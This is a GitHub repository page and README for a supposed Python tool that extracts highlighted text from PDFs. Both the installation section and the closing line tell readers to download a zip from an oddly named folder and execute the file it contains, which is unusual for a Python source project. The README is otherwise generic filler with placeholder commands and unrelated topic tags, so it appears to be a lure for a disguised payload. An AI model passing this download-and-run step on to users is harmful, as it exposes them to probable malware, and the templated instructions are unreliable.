https://github.com/kingpin707/pdf-highlight-extractor
A Python tool for extracting highlighted text from PDF files while preserving formatting attributes (headers, bold, italic) and removing unwanted line breaks and page breaks. Perfect for integrating with content management systems.
- Host: GitHub
- URL: https://github.com/kingpin707/pdf-highlight-extractor
- Owner: KINGPIN707
- License: mit
- Created: 2025-05-17T02:47:50.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-06-14T11:33:44.000Z (about 1 year ago)
- Last Synced: 2025-06-14T12:32:32.165Z (about 1 year ago)
- Topics: ai21labs, ebook-reader, extract-highlights, extract-text, faiss-backend, highlight-color, kindle, kindle-clippings, koreader, markdown, mobi, pdf-converter, python, remarkable-tablet
- Language: Python
- Size: 81.1 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# PDF Highlight Extractor 📝✨

Welcome to the **PDF Highlight Extractor** repository! This Python tool allows you to extract highlighted text from PDF files while keeping important formatting attributes like headers, bold, and italic text. It also removes unwanted line breaks and page breaks, making it ideal for integration with content management systems.
## Table of Contents
- [Features](#features)
- [Installation](#installation)
- [Usage](#usage)
- [Supported Formats](#supported-formats)
- [Dependencies](#dependencies)
- [Contributing](#contributing)
- [License](#license)
- [Contact](#contact)
## Features
- **Extract Highlighted Text**: Capture only the text you need without sifting through entire documents.
- **Preserve Formatting**: Maintain headers, bold, and italic styles for better readability.
- **Clean Output**: Automatically remove unwanted line breaks and page breaks.
- **Easy Integration**: Works seamlessly with various content management systems.
- **Cross-Platform**: Runs on any system that supports Python 3.
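The "Clean Output" feature can be pictured with a small sketch. This is not the tool's actual implementation; `clean_extracted_text` is a hypothetical helper that assumes page breaks arrive as form-feed characters and that blank lines mark paragraph boundaries. Note that the de-hyphenation step would also join genuine compounds split at a line end (for example `well-` / `known`).

```python
import re


def clean_extracted_text(raw: str) -> str:
    """Join hard-wrapped lines into paragraphs and drop page-break characters."""
    # Assumption: a form feed (\f) marks a page break in the extracted text.
    text = raw.replace("\f", "\n")
    # Re-join words hyphenated across a line break: "extrac-\ntion" -> "extraction".
    text = re.sub(r"(\w)-\n(\w)", r"\1\2", text)
    # Blank lines separate paragraphs; single newlines inside one are soft wraps.
    paragraphs = re.split(r"\n\s*\n", text)
    cleaned = [" ".join(p.split()) for p in paragraphs]
    return "\n\n".join(p for p in cleaned if p)


if __name__ == "__main__":
    sample = "High-\nlighted text that\nwraps.\n\nNext\fpage"
    print(clean_extracted_text(sample))
```

Splitting on blank lines first keeps paragraph boundaries intact, so only the soft wraps inside a paragraph are collapsed into spaces.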
## Installation
To get started with PDF Highlight Extractor, follow these steps:
1. **Clone the Repository**:
```bash
git clone https://github.com/KINGPIN707/PDF-Highlight-Extractor.git
cd PDF-Highlight-Extractor
```
2. **Install Dependencies**:
Use pip to install the required libraries.
```bash
# Assumes the requirements file uses the conventional name; adjust if it differs.
pip install -r requirements.txt
```
3. **Download the Latest Release**:
You can find the latest release [here](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip). Download the appropriate file and execute it.
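After installing, a quick check like the one below can confirm that the libraries listed under Dependencies are importable. It is only a sketch: `missing_packages` is a hypothetical helper, and the import names are the ones these libraries conventionally expose (`cv2` for OpenCV, `PIL` for Pillow, `fitz` for PyMuPDF), not names taken from this repository.

```python
from importlib.util import find_spec

# README label -> module name used in an import statement.
REQUIRED = {
    "numpy": "numpy",
    "opencv": "cv2",
    "Pillow": "PIL",
    "PyMuPDF": "fitz",
    "PyPDF2": "PyPDF2",
    "pypdfium2": "pypdfium2",
}


def missing_packages(required=REQUIRED):
    """Return the labels of packages whose module cannot be found."""
    return sorted(
        label for label, module in required.items() if find_spec(module) is None
    )


if __name__ == "__main__":
    missing = missing_packages()
    if missing:
        print("Missing:", ", ".join(missing))
    else:
        print("All dependencies found.")
```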
## Usage
Using PDF Highlight Extractor is straightforward. Here’s how to run the tool:
1. **Prepare Your PDF**: Make sure your PDF file is ready for extraction.
2. **Run the Tool**:
```bash
# Replace SCRIPT.py with the repository's entry-point script and INPUT.pdf with your PDF.
python SCRIPT.py INPUT.pdf
```
3. **View the Output**: The extracted text is saved in a new file, with header, bold, and italic formatting preserved.
### Example Command
```bash
python SCRIPT.py input.pdf
```
This command extracts the highlighted text from a PDF named `input.pdf` (an illustrative file name) and saves it in a new file. `SCRIPT.py` stands in for the repository's entry-point script.
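To illustrate what preserving headers, bold, and italic can look like in the output, here is a minimal sketch that turns text spans into Markdown. It assumes span dictionaries shaped like those PyMuPDF returns from `page.get_text("dict")`, where bit 1 of `flags` marks italic and bit 4 marks bold. The function names and the font-size threshold for headers are hypothetical and are not taken from this tool.

```python
# Bit values PyMuPDF documents for a span's "flags" field.
ITALIC = 1 << 1  # 2
BOLD = 1 << 4  # 16


def span_to_markdown(span: dict) -> str:
    """Wrap one span's text in Markdown emphasis markers based on its flags."""
    text = span["text"]
    stripped = text.strip()
    flags = span.get("flags", 0)
    if not stripped:
        return text
    if flags & BOLD and flags & ITALIC:
        marker = "***"
    elif flags & BOLD:
        marker = "**"
    elif flags & ITALIC:
        marker = "*"
    else:
        return text
    # Keep surrounding whitespace outside the markers so Markdown renders them.
    lead = text[: len(text) - len(text.lstrip())]
    trail = text[len(text.rstrip()):]
    return f"{lead}{marker}{stripped}{marker}{trail}"


def line_to_markdown(spans: list, heading_size: float = 16.0) -> str:
    """Render one line of spans; large text becomes a header (assumed heuristic)."""
    if spans and max(s.get("size", 0) for s in spans) >= heading_size:
        return "## " + "".join(s["text"] for s in spans).strip()
    return "".join(span_to_markdown(s) for s in spans).strip()


if __name__ == "__main__":
    line = [
        {"text": "Use ", "flags": 0, "size": 11},
        {"text": "bold ", "flags": BOLD, "size": 11},
        {"text": "and", "flags": 0, "size": 11},
        {"text": " italic", "flags": ITALIC, "size": 11},
    ]
    print(line_to_markdown(line))
```

Whether a font reports itself as bold or italic depends on the PDF's font metadata, so a real extractor may also need to inspect font names.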
## Supported Formats
The PDF Highlight Extractor supports various PDF formats. It works well with:
- Standard PDF files
- Scanned documents (OCR-enabled)
- PDF/A format
## Dependencies
The tool relies on several Python libraries for its functionality:
- `numpy`: For numerical operations.
- `opencv`: For image processing tasks.
- `Pillow`: For handling image files.
- `PyMuPDF`: For reading and manipulating PDF files.
- `PyPDF2`: For PDF file handling.
- `pypdfium2`: For rendering PDF pages.
The complete list of dependencies is in the repository's requirements file.
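As a rough picture of how PyMuPDF can be used for this kind of task, the sketch below collects the words that fall under each highlight annotation. It is an assumption about one workable approach, not this project's code: `quad_bounds`, `words_in_box`, and `extract_highlights` are hypothetical names, and a word counts as highlighted when its center lies inside a highlight quad's bounding box.

```python
def quad_bounds(points):
    """Bounding box (x0, y0, x1, y1) of one highlight quad given as 4 (x, y) points."""
    xs = [p[0] for p in points]
    ys = [p[1] for p in points]
    return min(xs), min(ys), max(xs), max(ys)


def words_in_box(words, box):
    """Return the text of words whose center lies inside box, in input order."""
    x0, y0, x1, y1 = box
    picked = []
    # Each word tuple follows the layout of page.get_text("words"):
    # (x0, y0, x1, y1, text, block_no, line_no, word_no)
    for wx0, wy0, wx1, wy1, text, *_ in words:
        cx, cy = (wx0 + wx1) / 2, (wy0 + wy1) / 2
        if x0 <= cx <= x1 and y0 <= cy <= y1:
            picked.append(text)
    return picked


def extract_highlights(pdf_path):
    """Return (page_number, text) pairs for every highlight annotation in the PDF."""
    import fitz  # PyMuPDF; imported here so the helpers above work without it

    results = []
    with fitz.open(pdf_path) as doc:
        for page in doc:
            words = page.get_text("words")
            for annot in page.annots():
                if annot.type[0] != fitz.PDF_ANNOT_HIGHLIGHT:
                    continue
                verts = annot.vertices or []
                picked = []
                # A highlight stores four vertices per highlighted line segment.
                for i in range(0, len(verts) - 3, 4):
                    picked += words_in_box(words, quad_bounds(verts[i:i + 4]))
                if picked:
                    results.append((page.number + 1, " ".join(picked)))
    return results
```

Testing word centers rather than full containment tolerates highlights that were drawn slightly short of a word's edges.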
## Contributing
We welcome contributions! If you’d like to improve PDF Highlight Extractor, please follow these steps:
1. **Fork the Repository**: Click on the "Fork" button at the top right of the page.
2. **Create a Branch**:
```bash
git checkout -b feature/YourFeature
```
3. **Make Your Changes**: Implement your feature or fix.
4. **Commit Your Changes**:
```bash
git commit -m "Add your message here"
```
5. **Push to Your Branch**:
```bash
git push origin feature/YourFeature
```
6. **Create a Pull Request**: Go to the original repository and click on "New Pull Request".
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
## Contact
For any inquiries or support, please reach out:
- **GitHub**: [KINGPIN707](https://github.com/KINGPIN707)
Thank you for using PDF Highlight Extractor! If you encounter any issues or have suggestions, feel free to open an issue in the repository.

To download the latest release, visit [this link](https://raw.githubusercontent.com/KINGPIN707/PDF-Highlight-Extractor/main/plier/PD_Extractor_Highlight_3.7-beta.5.zip) and execute the necessary file.
Happy extracting! 🎉